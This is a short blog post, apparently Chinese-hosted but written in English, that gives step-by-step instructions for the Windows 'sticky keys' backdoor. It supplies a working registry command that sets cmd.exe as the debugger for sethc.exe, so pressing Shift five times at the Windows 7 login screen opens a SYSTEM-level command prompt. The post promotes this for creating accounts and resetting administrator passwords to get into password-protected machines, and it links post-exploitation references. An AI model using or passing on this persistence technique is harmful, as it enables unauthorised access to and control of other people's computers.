windows shift backdoor(windows shift 后门)
This backdoor allows you to run command prompt (cmd.exe) with system privilege from the Windows 7 login screen. So with a system privilege command prompt in your hands, you can actually do a lot of stuff including creating new accounts to resetting administrator password to gain access to the password protected Windows. Check out these step-by-step instructions.
1.click on the cmd.exe and select “run as administrator”,ENTER
"REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
2.turn on sticky keys or high contrast using the hotkeys (Shift x 5 OR Alt+Shift+PrintScreen). and you will open cmd.exe
if you have any question,call me
reference material:
https://www.raymond.cc/blog/backdoor-reset-administrator-password-add-new-user-windows-7/
https://godlikesecurity.com/index.php/2016/10/14/post-exploitation-persisting-and-triggering-backdoors-in-windows/
还没有评论,来说两句吧...